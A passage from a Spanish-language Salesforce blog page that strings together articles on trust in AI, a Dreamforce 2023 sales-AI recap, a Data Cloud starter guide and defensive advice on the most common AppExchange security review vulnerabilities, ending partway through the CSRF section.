Garantizar la fiabilidad:

  • Establezca expectativas claras: establezca el alcance, el cronograma y los resultados de los proyectos desde el principio. Esta transparencia permite a los clientes esperar resultados y comprender el camino que les espera.
  • Supere las expectativas: vaya más allá de lo básico. Entregue proyectos antes de lo previsto, ofrezca información adicional o proporcione recomendaciones que se alineen con su compromiso con el éxito del cliente.

Impulsar la transformación continua con
La Oficina de Innovación Continua

Los servicios profesionales de Salesforce pueden ayudarle a elevar sus capacidades para obtener el máximo valor de su
Inversión en Salesforce.

Defender la integridad:

  • Documentación transparente: comparta cómo funciona su plataforma de IA, incluidas sus fuentes de datos y algoritmos. La comunicación transparente le ayudará a generar confianza y aclarar cualquier confusión.
  • Compromiso ético: enfatice su dedicación a las prácticas éticas de IA y la seguridad de los datos. Asegúrese de compartir cómo sigue las pautas éticas y las normas de privacidad de datos. Al hacerlo, tranquilizará a los clientes sobre su integridad.

Intención de exhibición:

  • Soluciones personalizadas: adapte sus soluciones de IA para que coincidan con los objetivos específicos de su cliente . Muestre cómo está diseñada su plataforma para abordar sus requisitos únicos. Como resultado, reforzará lo importante que es para usted su éxito.
  • Alineación continua: mida y comunique periódicamente cómo sus soluciones de IA contribuyen no solo a los objetivos del cliente sino también a sus objetivos de sostenibilidad más amplios. Esta alineación continua subraya su dedicación a su éxito y su compromiso con la responsabilidad ambiental en toda la asociación.

Al integrar estos pilares en su estrategia de IA, abordará las preocupaciones sobre la confianza y podrá posicionar la IA como un catalizador para la creación de confianza.

Un futuro de confianza con IA

A medida que la IA continúa transformando las industrias, no podemos exagerar la importancia de la confianza. En Salesforce Professional Services , reconocemos que la confianza es primordial en el mundo de la IA confiable. Nuestro equipo dedicado está listo para guiarlo a través de este panorama transformador.

Salesforce Professional Services ofrece una oportunidad única a las organizaciones que inician su viaje hacia la IA. Adopte AI Coach y aproveche nuestra experiencia para maximizar el potencial de la IA. Trabajamos con usted para escalar y personalizar las experiencias de los clientes alineándonos con los resultados comerciales, construyendo un camino hacia el valor comercial, preparándonos para la entrega inmediata y estableciendo una hoja de ruta para el estado futuro que esté alineada con su visión y objetivos.

Con un historial de implementaciones exitosas de IA y un compromiso con las prácticas éticas, ofrecemos experiencia que va más allá de la tecnología: es una asociación basada en la confianza.

Mark Wakelin

Mark Wakelin , vicepresidente ejecutivo de servicios profesionales globales

Ejecutivo senior con experiencia como director ejecutivo y director de éxito de la plataforma Salesforce, gestionando organizaciones con más de 10 000 empleados y ventas superiores a los 3 mil millones de dólares. Más de 30 años de experiencia en ERP, Front-Office, computación en la nube, SaaS e IA generativa, impulsando la innovación y el valor empresarial. Enfocados en la diversidad, la inclusión y la igualdad en el lugar de trabajo, con un compromiso con la filantropía. Aproveche su profunda experiencia financiera y técnica para lograr el éxito.

Más de Mark

Seguir leyendo

Todo lo que aprendimos sobre IA para ventas en Dreamforce 2023

Todo lo que aprendimos sobre IA para ventas en Dreamforce 2023

Dreamforce fue épico. Compartimos consejos y noticias de la industria con Salesblazers, hicimos amigos y repartimos montones de regalos (nuestros peluches son insuperables). Sin embargo, entre todas las sesiones de puesta al día y aprendizaje de este año, se destacó un tema: la importancia crítica de la inteligencia artificial (IA) en las ventas.

Los equipos de ventas están viendo el surgimiento de nuevas herramientas de inteligencia artificial para ayudar a la prospección, el entrenamiento y la previsión, todo al servicio de la eficiencia de las ventas. También hay un mayor interés en la información sobre los clientes en tiempo real como ventaja competitiva, alojada en un CRM único y seguro.

¿Cómo están aprovechando todo esto los mejores equipos de ventas, manteniendo al mismo tiempo relaciones sólidas con los clientes? Descubra sus consejos y trucos de ventas a continuación.

¿Te perdiste la conferencia magistral de Dreamforce Sales Cloud? Transmítalo en Salesforce+

Escuche lo que dicen los líderes de ventas innovadores sobre la innovación impulsada por la IA, la toma de decisiones basada en datos y las últimas innovaciones de Sales Cloud.

1. Priorice los datos seguros antes de adoptar la IA generativa

El campo en constante evolución de la IA promete mejorar la eficiencia de los vendedores, pero conlleva algunos desafíos de seguridad. Una investigación reciente de Salesforce encontró que el 73% de los empleados cree que la IA generativa introduce nuevos riesgos de seguridad. Hay buenos motivos para preocuparse: las herramientas públicas de IA generativa carecen de cifrado de datos, de enmascaramiento de datos y, en realidad, de cualquier tipo de protección de seguridad. Esto hace que sus datos sean vulnerables al robo y al mal uso.

En el último año, todos nos hemos vuelto un poco más inteligentes en lo que respecta a la seguridad. Ahora sabemos que debemos evitar conectar los datos de los clientes a herramientas públicas de IA generativa y que todavía necesitamos un ser humano en el medio para revisar manualmente cualquier copia de IA generativa para garantizar la precisión. Y si desea aprovechar la IA generativa, debe hacerlo en un entorno que pueda controlar, con todas las protecciones de seguridad que necesita para evitar que sus datos caigan en las manos equivocadas.

Cómo Salesforce le ayuda a mantener la seguridad:

La confianza siempre ha sido nuestro valor número uno, razón por la cual lanzamos Einstein Trust Layer a principios de este año. Se trata de una arquitectura de IA segura, integrada de forma nativa en la plataforma Salesforce. Diseñado para estándares de seguridad empresarial, permite a los equipos beneficiarse de la IA generativa sin comprometer los datos de sus clientes. Por ejemplo, si bien los mensajes impulsan cada salida de IA generativa, nuestra arquitectura Zero Retention garantiza que no se almacenen datos de clientes fuera de Salesforce. El enmascaramiento de datos (ocultar cualquier información confidencial de una empresa o un individuo) proporciona una capa adicional de protección.

2. No esperes para unirte a la IA generativa

La IA generativa puede parecer una adición espectacular a su pila tecnológica, pero no es simplemente algo "bueno tenerlo". Lo necesita para seguir siendo competitivo. Según nuestro reciente informe Tendencias en IA generativa para ventas , el 55% de los profesionales de ventas informan que actualmente o planean usar IA generativa, y el 58% dice que les ayuda o les ayudará a aumentar la productividad.

Es fácil ver por qué la adopción está aumentando. Los representantes pueden utilizar indicaciones basadas en texto para identificar clientes potenciales, investigar empresas, redactar correos electrónicos e incluso analizar correos electrónicos anteriores para descubrir necesidades de clientes potenciales que no han abordado. Los CRM más avanzados impulsados por IA pueden personalizar las comunicaciones e incluso imitar la voz y el tono de los representantes. Esto permite a los vendedores deshacerse de las tareas manuales que consumen mucho tiempo y centrarse en lo que realmente importa: construir relaciones significativas con los clientes .

Cómo ayuda Sales Cloud a que la IA sea accesible para todos:

En Dreamforce, presentamos algunas ingeniosas innovaciones de IA generativa para Sales Cloud ofrecidas a través de Einstein 1 Sales, nuestro conjunto de herramientas de IA:

Resumen de llamadas: resuma automáticamente las llamadas para resaltar los temas clave cubiertos durante las reuniones y los próximos pasos.

Correos electrónicos de ventas: genere automáticamente correos electrónicos personalizados e hiperrelevantes para cada conversación de ventas utilizando los datos del cliente que ya están alojados en Sales Cloud.

Einstein Copilot para ventas: descargue el trabajo pesado durante todo el ciclo de ventas a un asistente digital, incluida la investigación de cuentas, la preparación de reuniones (establecimiento de agenda y notas a tener en cuenta) y actualizaciones de registros de transacciones.

3. Apóyese en el análisis en tiempo real y la IA predictiva para ganar cuando llegue el cambio

Como selamentó recientemente uno de nuestros Salesblazers, muchas empresas todavía están atrapadas en hojas de cálculo obsoletas que requieren actualizaciones y análisis manuales lentos y que consumen mucho tiempo. Ése es el engorroso modus operandi operativo del pasado y dificulta actuar según la información más reciente sobre acuerdos. Peor aún: predecir lo que sucederá a continuación es una tarea hercúlea e imprecisa.

Al aprovechar el poder de la automatización, los equipos de ventas pueden apoyarse en su CRM para actualizar los registros de transacciones en tiempo real (léase: no más hojas de cálculo). Cuando se combina con IA predictiva, los representantes y gerentes pueden recibir alertas sobre posibles problemas de acuerdos y pronósticos antes de que las cosas se descarrilen.

Y eso es realmente sólo el comienzo. Imagínese esto: mientras los representantes se mantienen al tanto de las últimas novedades sobre los acuerdos, los gerentes aprovechan los datos en tiempo real para realizar un seguimiento del desempeño del equipo sobre la marcha, identificando oportunidades de capacitación en el momento (como clientes potenciales estancados) que pueden abordar rápidamente para mantener a los representantes encaminados. . Al mando, los líderes utilizan los datos más recientes para obtener una visión holística del desempeño de su organización de ventas en relación con los objetivos.

Los datos en tiempo real y la IA predictiva son las claves de todo esto, lo que permite a los equipos de ventas detectar señales de alerta tempranas y cambiar rápidamente las estrategias para garantizar que alcancen sus objetivos de ventas .

Cómo la IA predictiva y en tiempo real de Sales Cloud le ayuda a mantenerse por delante de sus competidores:

Al utilizarEinstein Activity Capture , Sales Cloud captura y unifica automáticamente datos de cada interacción con el cliente, como correos electrónicos, chats en línea y llamadas telefónicas, para que los representantes puedan ver su propio "estado de ventas" en cualquier momento. Aún mejor, los equipos pueden extraer datos de herramientas de terceros y armonizarlos con los registros de CRM existentes para obtener una vista de 360 grados de cada cliente y cliente potencial. Aplique la funcionalidad predictiva de IA y obtendrá recomendaciones muy relevantes para los próximos mejores pasos que harán avanzar cada acuerdo.

Para gerentes y líderes de ventas, las actualizaciones de datos en tiempo real y la IA predictiva se unen en El panel Deal Insights de Sales Cloud para detectar posibles problemas de pronóstico con anticipación para que los equipos puedan ajustar la estrategia y mantener el rumbo. La actividad de los representantes también se captura a través de Activity 360 : los gerentes pueden ver métricas clave del equipo, como clientes potenciales en proceso y tasa de ganancias, en un solo lugar para descubrir oportunidades de capacitación mientras todavía hay tiempo para impactar los acuerdos.

4. Invierta en una única plataforma en lugar de múltiples herramientas desconectadas

Nuestro reciente informe sobre el estado de las ventas reveló una cruda realidad: el 66% de los representantes de ventas se sienten abrumados por la multitud de herramientas disponibles. El atractivo de la tecnología de próxima generación, incluidos los complementos de IA generativa y las herramientas de función única, amenaza con agravar ese problema.

¿El grito de guerra del escenario de Dreamforce? Simplifique su pila tecnológica . Reemplace las soluciones puntuales con una plataforma que pueda ampliar con nuevas características, capacidades o funciones a medida que surjan las necesidades. Priorice las funciones principales, como la gestión de contactos, la gestión de canales y la previsión, pero también busque una plataforma que le permita integrar perfectamente capacidades de IA y análisis en tiempo real para eliminar la fatiga de alternar entre sistemas.

Cómo le ayuda Sales Cloud a impulsar las ventas de un extremo a otro:

Más allá de satisfacer las necesidades básicas del día a día de los vendedores a través de herramientas como Activity Capture, puede aprovechar la plataforma Sales Cloud para simplificar su pila tecnológica en ventas y operaciones, al tiempo que incorpora el poder de la IA. Por ejemplo, los equipos que supervisan la planificación de ventas y los programas de habilitación de ventas pueden utilizar el poder de los datos de actividad de clientes y vendedores en tiempo real para realizar esa planificación y seguimiento de resultados directamente dentro de Sales Cloud CRM. Muchos clientes de Sales Cloud incluso extienden las funciones de automatización e inteligencia de su CRM a los canales de socios a través de nuestra solución Partner Relationship Management .

5. La tecnología es importante, pero no pierdas el foco en las relaciones

Este último es un poco pivote.

Si hay algo que ha llamado la atención de los líderes de ventas en los últimos tiempos es esto: las relaciones te hacen o te deshacen. Es importante que estemos al tanto de las últimas tecnologías, como la IA, pero lo que es igualmente importante son las conexiones que establecemos con nuestros equipos y nuestros clientes. Eso siempre comienza con la superación personal. Cuanto mejor seas para involucrarte, comunicarte y animar a los demás, mejores serán tus relaciones.

Los Salesblazers hablaron mucho sobre esto durante Dreamforce, pero tres consejos fueron los que más resonaron. Primero, nunca dejes de aprender. Tome clases, obtenga experiencia práctica, haga crecer su red de pares y aprenda de otros en su campo. En segundo lugar, valore la confianza que se ha ganado con sus clientes y continúe fortaleciendo esas relaciones haciendo un seguimiento y ofreciéndoles recursos útiles que sabe que necesitan. En tercer lugar, muestra siempre lo mejor de ti. Tómese el tiempo para comprender qué es lo que realmente motiva a sus clientes y brinde las soluciones que necesitan antes de que sepan que las necesitan. Haga un esfuerzo adicional y descubrirá que la lealtad llega rápidamente.

Hay días difíciles y días fáciles, pero cada día es una oportunidad para apuntalar las relaciones que son la base de las ventas.

Cómo Salesforce puede ayudarle a fomentar relaciones sólidas:

La comunidad Salesblazer es el lugar al que acuden todos los profesionales de ventas para obtener asesoramiento profesional, orientación táctica de ventas y creación de redes. Únase y conéctese con compañeros Salesblazers que pueden ayudarlo a aprender, conectarse y crecer.

Prepárese para el éxito en las ventas

¿Qué aprendimos en Dreamforce? En resumen, la IA es el nombre del juego. A medida que evoluciona la industria de las ventas, los líderes de ventas pueden mejorar la productividad con IA generativa, tomar decisiones más rápidas basadas en datos con IA predictiva y optimizar la tecnología para que los representantes puedan centrarse más en la construcción de relaciones. Si los tiene en la mira, en 2024 estará por delante del resto.

Transmita lo mejor de Dreamforce 2023

¿Extrañas la magia? No te preocupes. Vea toda la cobertura de IA y vea qué están haciendo los principales líderes de ventas para salir adelante en 2023. ¡Todo está bajo demanda en Salesforce+!

Seguir leyendo

Cómo comenzar con Salesforce Data Cloud: guía 101 y casos de uso

Cómo comenzar con Salesforce Data Cloud: guía 101 y casos de uso

Última actualización el 2 de octubre de 2023 por Rakesh Gupta

Los datos no son sólo un buen extra; es esencial. Especialmente ahora, cuando las empresas operan en gran medida en espacios digitales, la necesidad de un buen uso de los datos es clara. El papel del análisis de datos se ha vuelto crucial para impulsar el éxito de una empresa. Es importante que los líderes de las empresas tengan un plan de datos sólido, uno que permita que sus negocios avancen rápidamente y enfrenten desafíos difíciles.

Los equipos se benefician enormemente de un análisis de datos sólido. Pueden tomar decisiones inteligentes más rápido que antes y también con mayor precisión. Este tipo de uso de datos también ayuda a los equipos a trabajar mejor juntos al eliminar cosas que obstaculizan un buen trabajo en equipo. Los líderes de TI tienen un papel especial aquí. Tienen las habilidades para hacer que los datos sean útiles de nuevas maneras, transformando el trabajo de los equipos y mejorando la experiencia de los clientes.

¿Qué es Salesforce Data Cloud y por qué debería implementarlo?

Salesforce Data Cloud está diseñada para cambiar la forma en que las empresas interactúan con los clientes. Es bueno para recopilar datos de diferentes lugares. Estos datos van a una gran área de almacenamiento llamada lago de datos. Luego utiliza un análisis preciso para explicar lo que significan los datos.

Salesforce Data Cloud ayuda a vincular varias fuentes y nubes más rápidamente en toda la plataforma. Sin embargo, Data Cloud también es un artículo que se puede pedir. Aunque no todos los clientes de Salesforce han comprado Data Cloud, aunque se encuentran en el punto de partida, todavía utilizan Data Cloud hasta cierto nivel. Sin embargo, todo esto se fortalece cuando se utiliza la Nube de Datos como plataforma de personalización y unificación de datos.

¿Por qué necesito implementar una nube de datos ahora?

Imagínese cómo el volumen de datos crece rápidamente cuando piensa en la cantidad de clics que hace cada cliente. Puede realizar un seguimiento de dichos datos de participación a medida que ocurren, por ejemplo, cuando los usuarios abren y hacen clic en correos electrónicos, exploran páginas en sus aplicaciones móviles y miran artículos en su tienda en línea. Es mucho más probable que las personas hagan clic cuando les envías un correo electrónico o una oferta que les resulta útil. Puede capturar la interacción cuando un consumidor hace clic en Data Cloud. Cuando sepa qué les interesa y si es probable que compren algo o no, podrá aprovechar esta información a su favor.

Para cada sector o puesto, la Nube de Datos puede generar experiencias y oportunidades de negocio potentes.

Para analizar cuentas integradas y adquirir información rápida y fácilmente sobre sus clientes y los efectos comerciales, los analistas pueden conectar Data Cloud a Tableau o QlikView . Cuando una empresa puede identificar a sus consumidores en función de la cantidad y el tema de sus tickets de soporte, puede desarrollar y llevar a cabo un plan para reducir esos tickets. Verifique los datos nuevamente para asegurarse de que el plan haya tenido éxito.

Los desarrolladores pueden crear software utilizando datos de Data Cloud, como un sistema de puntuación de salud que mide la puntuación de salud de un paciente utilizando objetos e información prediseñados. Cuando una actividad de datos inicia un flujo para enviar notificaciones a los médicos cuando una puntuación cae por debajo de un nivel específico, esa puntuación y su uso se convierten en una experiencia que salva vidas.

Según la probabilidad de conversión de un cliente, los vendedores pueden obtener información sobre sus clientes potenciales y sus ventas potenciales. Según los hábitos de navegación de los usuarios y los niveles actuales de oferta de productos, la gestión del comercio electrónico puede utilizar datos para personalizar su sitio web.

¿Cómo funciona la nube de datos de Salesforce?

Fuente de la imagen: Blog de desarrolladores de Salesforce Reúna todos los datos de sus clientes en Data Cloud

En pocas palabras, Data Cloud permite a los administradores de Salesforce realizar una variedad de acciones, que incluyen, entre otras:

  • Vincula tus fuentes de datos por lotes y de streaming.
  • Refine los datos entrantes empleando métodos de transformación y adhiriéndose a protocolos de gobernanza.
  • Estandariza tus datos conformándolos a un modelo establecido.
  • Fusione diferentes elementos de datos mediante la aplicación de reglas de coincidencia de identidades.
  • Explore su conjunto de datos para obtener información mediante consultas y análisis en profundidad.
  • Implementar algoritmos de inteligencia artificial para pronosticar comportamientos.
  • Divida y fragmente sus datos y luego impleméntelos en múltiples plataformas para crear experiencias personalizadas.
  • Evalúe sus datos a través de soluciones de análisis compatibles.
  • Exporte estos datos a diversos destinos, alineando acciones con objetivos comerciales específicos.
  • Vuelva a evaluar, cuantifique y ajuste periódicamente sus activos de datos.
Fuente de la imagen: Ayuda de Salesforce Acerca de Salesforce Data Cloud

Cómo empezar con la nube de datos

Se puede utilizar una estructura similar a un lago de datos para describir Salesforce Data Cloud. Como ejemplo, recopilando todos los datos de la plataforma Salesforce. Sin embargo, también es capaz de importar datos de otras fuentes externas, como lagos de datos.

Perspectiva :

Un lago de datos es una ubicación concentrada para almacenar datos no procesados. Las empresas utilizan este sistema de almacenamiento enorme, adaptable y asequible para recopilar y guardar grandes cantidades de datos organizados, no estructurados y semiestructurados en su formato original. Las publicaciones en redes sociales, los registros de sensores y los datos de ubicación son solo algunos ejemplos de los datos no estructurados que recopilan los lagos de datos.

Lo que indica para los usuarios : las marcas son más capaces de predecir los requisitos y necesidades de los consumidores debido a la gran cantidad de información accesible en un lago de datos.

Cómo afecta a los equipos : Los equipos pueden acceder a enormes cantidades de datos en una ubicación, lo que les permite moverse más rápidamente y mantenerse al día con (o superar) a los oponentes.

Pasos de implementación

Revise esta lista de verificación sugerida antes de comenzar a utilizar Data Cloud. Confirme que su equipo esté configurado antes de implementar Data Cloud, verifique estos puntos:

  • El equipo comprende los principales conceptos y restricciones que pueden afectar la facturación.
  • Analiza la gestión de la marca y la estructura organizacional.
  • Examina los principios del modelo de datos antes de acordar una estrategia de datos.
  • Analice los datos que ya tiene y las fuentes de datos.
  • Reconoce a un administrador de Salesforce para configurar Salesforce Data Cloud.
  • Enumera los usuarios además de los permisos que requieren.
  • Establece objetivos de segmentación.
Fuente de la imagen: Configuración de la nube de datos del módulo Trailhead

Costo y disponibilidad de Salesforce Data Cloud

Salesforce Data Cloud es costoso. Es una inversión que requiere una planificación meticulosa porque comienza en $10 mil por organización, mensualmente. De manera realista, dependiendo de los valores de sus datos, es posible que su empresa ya necesite gastar más en Data Cloud. Como tus datos crecen constantemente, es importante tenerlo presente todo el tiempo, pero…  

… En el último evento de Dreamforce, Salesforce anunció que las licencias gratuitas de Data Cloud ya están disponibles. Los clientes que tengan Enterprise Edition o superior ahora pueden acceder a Data Cloud sin costo alguno. En esta oferta se incluyen dos licencias de Tableau Creator, que permiten a las empresas conectar hasta 10 000 perfiles de clientes y comenzar sus exploraciones.

En conclusión

Los datos son más cruciales que nunca y supervisar el flujo de datos en constante crecimiento es un trabajo increíble. Sin embargo, los datos tienen una enorme influencia. El potencial de obtener conocimientos empresariales que puedan fundamentar decisiones y producir experiencias sorprendentes para los clientes crece a medida que aumenta el acceso a los datos y la alfabetización sobre datos para las personas de toda su empresa. La IA y el CRM se pueden utilizar para impulsar actividades inteligentes y proporcionar servicios personalizados a escala cuando se combinan con datos procesables en tiempo real.

Ahora, con Data Cloud y Einstein AI nativos en la plataforma Einstein 1, las empresas pueden crear fácilmente aplicaciones y flujos de trabajo impulsados por AI que potencian la productividad, reducen costos y brindan increíbles experiencias a los clientes. – Parker Harris, cofundador y director de tecnología, Salesforce

Los datos del cliente, el contenido empresarial, los datos de telemetría, los chats de Slack, los datos parcialmente estructurados y otros datos estructurados y no estructurados se fusionan y conectan mediante Data Cloud, la plataforma de datos a hiperescala de Salesforce que funciona en tiempo real, para generar un perfil único del cliente. La plataforma ya vincula e integra 100 mil millones de registros diariamente y procesa 30 billones de transacciones mensuales.

Las empresas ahora pueden crear perfiles de clientes completos y unificados, ofrecer nuevas experiencias de CRM y acceder a datos fragmentados de formas completamente nuevas gracias a la integración completa de la nueva Nube de Datos con la Plataforma Einstein 1.

Referencias:

Dorian es un administrador y desarrollador certificado 4x de Salesforce con amplia experiencia en la personalización de Salesforce según las necesidades del cliente. Comenzó su trayectoria en TI como administrador de CRM y mantuvo su enfoque en el ecosistema de Salesforce. Le encanta explorar nuevas integraciones en Salesforce y detectar formas alternativas de optimizar los procesos comerciales dentro del CRM. Actualmente trabaja como desarrollador de Salesforce a tiempo completo y contribuye con contenido al portal educativo SFApps.info.

Evaluación formativa:

¡Quiero saber de ti!

¿Qué es lo que aprendiste de esta publicación? ¿Cómo imagina aplicar este nuevo conocimiento en el mundo real? Siéntete libre de compartir en los comentarios a continuación.

Seguir leyendo

Las 20 vulnerabilidades principales encontradas en la revisión de seguridad de AppExchange ☁️

Las 20 vulnerabilidades principales encontradas en la revisión de seguridad de AppExchange ☁️

Esta es una traducción que desde EGA Futura ofrecemos como cortesía a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoamérica .

El enlace a la publicación original, lo encontrarás al final de este artículo.

Las 20 principales vulnerabilidades encontradas en la revisión de seguridad de AppExchange | Blog de desarrolladores de Salesforce

Se sabe que la revisión de seguridad de AppExchange es uno de los procesos de revisión más rigurosos de cualquier mercado de aplicaciones en línea. Esta estricta reputación es algo de lo que Salesforce se enorgullece, siendo la confianza nuestro valor número uno. Como mercado de software empresarial, tenemos la profunda responsabilidad de cumplir con los más altos estándares de seguridad posibles para la protección de los datos de los clientes.

Dicho esto, estos estándares pueden representar un desafío importante para los socios ISV que buscan publicar ofertas en AppExchange. Para ayudar a mejorar la transparencia y ayudarlos a todos a tener éxito, en orden de prevalencia, esta publicación analizará las 20 razones principales por las que los socios no pasan la revisión de seguridad (a partir de 2023). También cubriremos cómo remediar o prevenir estos problemas.

#1 — Aplicación de CRUD/FLS

¿Qué es esto?

Las vulnerabilidades de aplicación de la seguridad a nivel de objetos y campos (CRUD/FLS) son la razón principal (por un margen significativo) para no pasar la revisión de seguridad de AppExchange. Estas vulnerabilidades representan fallas al verificar adecuadamente si los objetos y/o campos son accesibles, creables, eliminables y/o actualizables antes de ejecutar consultas o acciones de base de datos. Si su oferta de AppExchange contiene algún código de Salesforce, este problema debe ser su prioridad número uno a resolver antes de enviarlo para una revisión de seguridad.

¿Cómo puedo abordar esto?

Si, durante su proceso de codificación, no ha implementado consistentemente comprobaciones CRUD/FLS o no ha ejecutado SOQL, SOSL y DML en modo de usuario, querrá hacer una revisión muy exhaustiva de su código base para asegurarse de que no esté realizar cualquier operación de creación/lectura/actualización/eliminación no marcada en objetos o campos.

El método preferido y moderno para hacer cumplir CRUD/FLS implica utilizar el modo de usuario en todas las consultas y operaciones de bases de datos. La desventaja de esto es que Checkmarx, PMD y el motor de reglas PMD de Code Analyzer aún no lo admiten completamente (al momento de escribir esta publicación, PMD admite WITH USER_MODE en SOSL/SOQL, pero no el modo de usuario DML, por lo que si usa este tipo de protección arrojará falsos positivos). Code Analyzer Graph Engine es actualmente la única herramienta que admite ambos tipos de modos de usuario. Consulte el comando scanner:run:dfa en la documentación para ejecutar un escaneo con Code Analyzer Graph Engine.

Si ha estado aplicando CRUD/FLS a la antigua usanza con Schema.DescribeSObjectResult (es decir, métodos como isCreatable() , isUpdateable() , isDeletable() ), entonces Code Analyzer y la extensión PMD para VS Code pueden ser útiles herramientas que puede utilizar para comprobar su código base. Puede seguir nuestra guía para obtener más información sobre cómo utilizar PMD para VS Code y Code Analyzer para eliminar las infracciones CRUD/FLS.

El escáner Checkmarx debe utilizarse como verificación final de violaciones de CRUD/FLS. Puede ejecutar este análisis a través del Portal de seguridad para socios .

Obtenga más información sobre la aplicación de CRUD/FLS en Trailhead .

#2 – Versión de software insegura

¿Qué es esto?

Esto significa que alguna pieza de software (normalmente, una versión específica del software) utilizada en su oferta tiene vulnerabilidades de seguridad conocidas. La mayoría de las veces, es porque estás usando una versión desactualizada de una biblioteca de JavaScript (por ejemplo, jQuery es, con diferencia, la más común), pero también podría ser algo así como versiones antiguas de nginx, bibliotecas de Python, CKEditor o PHP.

¿Cómo puedo abordar esto?

Intente identificar todas las bibliotecas, marcos, software y otras tecnologías que no sean de Salesforce dentro del alcance de su oferta de AppExchange.

Busque cada uno de estos en Snyk (para proyectos de código abierto) o en la base de datos CVE . CVE significa "vulnerabilidades y exposiciones comunes" y la base de datos CVE representa un glosario de vulnerabilidades de seguridad conocidas públicamente que es mantenido y operado por el FFRDC Nacional de Ciberseguridad de EE. UU. y MITRE Corporation. También puede utilizar el complemento RetireJS de Salesforce Code Analyzer para ejecutar un escaneo de su código base empaquetado para buscar bibliotecas de JavaScript con vulnerabilidades conocidas.

Nota: En algunos casos, puede agregar documentación de falsos positivos para argumentar que un CVE particular registrado no podría aplicarse a su oferta, ya que quizás no esté utilizando la funcionalidad asociada con ese CVE.

#3 – Violación al compartir

¿Qué es esto?

Básicamente, esto significa que tiene clases de Apex en las que no ha agregado explícitamente la palabra clave with sharing al encabezado de la clase, omitiendo así las reglas de uso compartido de una organización.

¿Cómo puedo abordar esto?

Simplemente verifique todas sus clases de Apex y asegúrese de tener with sharing (o el uso compartido heredado) definido en el encabezado de la clase. Para los casos en los que necesita que una clase se ejecute sin compartir (por ejemplo, la clase debe ejecutarse en un contexto de sistema y no en un contexto de usuario), agregue una explicación a su documento de falso positivo que explique el caso de uso empresarial (e idealmente, agregue comentarios en la parte superior). de los encabezados de clase relevantes para que quede aún más claro).

Code Analyzer , PMD para VS Code y Checkmarx también pueden ayudarlo a escanear su código.

Obtenga más información sobre cómo compartir el cumplimiento a través de Trailhead .

#4: Almacenamiento inseguro de datos confidenciales

¿Qué es esto?

Los secretos no deben estar codificados en el código fuente. Aunque el código puede estar contenido en un paquete administrado donde el código está oculto para los clientes, todavía existen razones por las que esta es una práctica insegura, entre ellas:

  • El cliente debe tener control sobre sus secretos y claves y, en muchos casos, debe poder cambiarlos o actualizarlos.
  • Los secretos pueden quedar expuestos en registros o mensajes de error
  • Si un secreto o clave caduca, el cliente no podrá actualizarlo por sí mismo.

¿Cómo puedo abordar esto?

Asegúrese de que no haya secretos codificados en el código fuente, incluso si es un paquete administrado. Asegúrese de que todos los secretos se almacenen de una de las siguientes maneras:

  • Campos de metadatos personalizados protegidos (para secretos propiedad de socios)
  • Configuraciones personalizadas protegidas (para secretos propiedad del suscriptor/cliente)
  • Credenciales con nombre (esto generalmente no se recomienda, pero si tiene un caso de uso específico que lo requiera, es posible que se permita caso por caso)
  • Cifrado y almacenado en objetos personalizados con la clave de cifrado almacenada en una configuración personalizada protegida o en un campo de metadatos personalizados ocultos

Obtenga más información sobre el almacenamiento seguro de secretos en Trailhead .

#5 — Configuración TLS/SSL

¿Qué es esto?

Todas las conexiones entrantes y salientes que involucran a sus comunidades, sitios y portales de Salesforce deben utilizar Transport Layer Security (TLS) 1.2. Este requisito es válido en los modos Lightning Experience y Salesforce Classic para comunidades y sitios, independientemente de si están en las ediciones Essentials, Enterprise, Performance, Unlimited o Developer.

¿Cómo puedo abordar esto?

Verifique que el acceso a su navegador, las integraciones de API y otras funciones de Salesforce sean compatibles con TLS 1.2.

Una forma sencilla de hacerlo es utilizar Qualys SSL Scanner. El equipo de revisión de seguridad ejecutará este análisis en todos y cada uno de los puntos finales externos o que no sean de Salesforce involucrados en su solución. Si sus terminales no reciben una calificación A por cumplimiento de SSL/TLS, su revisión de seguridad no será aprobada.

Para ejecutar el escaneo, simplemente ingrese la URL base en el formulario web de prueba del servidor SSL de Qualys y presione Enviar.

Puede encontrar más detalles sobre los requisitos de TLS en las notas de la versión .

#6 — Información confidencial en depuración

¿Qué es esto?

Este tipo de vulnerabilidad describe situaciones en las que se filtra información confidencial, como secretos de aplicaciones, datos del sistema o información de depuración demasiado detallada, a través de funciones de registro u otros flujos de salida. Por lo general, esto sucede cuando el registro detallado está habilitado para fines de desarrollo, pero luego no se reduce adecuadamente antes de enviarlo para la revisión de seguridad de AppExchange.

¿Cómo puedo abordar esto?

En su paquete de Salesforce, asegúrese de buscar en su código fuente todas las declaraciones de depuración del paquete para asegurarse de que no registren información confidencial o secretos.

Asegúrese de que los códigos de error y los mensajes de error en toda su solución tengan un nivel de información apropiado para que todos los usuarios los vean. Por ejemplo, los usuarios habituales generalmente no deberían ver seguimientos de pila completos ni información de depuración detallada. De manera similar, asegúrese de que otras funciones de registro o flujos de salida tampoco filtren datos confidenciales.

Code Analyzer y PMD para VS Code pueden ayudarlo a detectar estos problemas en las aplicaciones de Salesforce, y los escáneres de aplicaciones web como Burp Suite , Chimera u OWASP ZAP también pueden ayudarlo a detectar estos problemas en sus integraciones externas y aplicaciones web.

Obtenga más información sobre cómo verificar los seguimientos de la pila e información detallada sobre las excepciones en el número 13.

#7 – CSRF

¿Qué es esto?

La falsificación de solicitudes entre sitios (CSRF) es un tipo de ataque que engaña a una víctima para que ejecute acciones no deseadas en una aplicación web en la que está autenticada. Explotar la confianza que un sitio tiene en el navegador del usuario puede llevar a acciones potencialmente dañinas, como cambiar direcciones de correo electrónico y contraseñas, o incluso realizar transacciones sin el conocimiento o consentimiento del usuario.

En la plataforma Salesforce, existe un token anti-CSRF para contrarrestar dichos ataques, que ofrece protección mientras se utilizan controladores y métodos estándar. Sin embargo, los desarrolladores pueden eludir involuntariamente estas salvaguardas anti-CSRF al crear sus propios métodos de acción.

¿Cómo puedo abordar esto?

En general, las aplicaciones web pueden prevenir ataques CSRF principalmente implementando tokens anti-CSRF, que son valores únicos y específicos del usuario incluidos en cada solicitud de cambio de estado para verificar la fuente. Además, deben adoptar la práctica de cookies del mismo sitio, que impide que el navegador envíe la cookie junto con solicitudes entre sitios, mitigando así los riesgos de CSRF.

Para páginas de Visualforce:

  • Al crear páginas de Visualforce, evite utilizar solicitudes HTTP GET que cambien de estado; use POST o PUT para cambios de estado en su lugar
  • No ejecute acciones automáticas ni cambie el estado (por ejemplo, operaciones DML) al cargar la página.
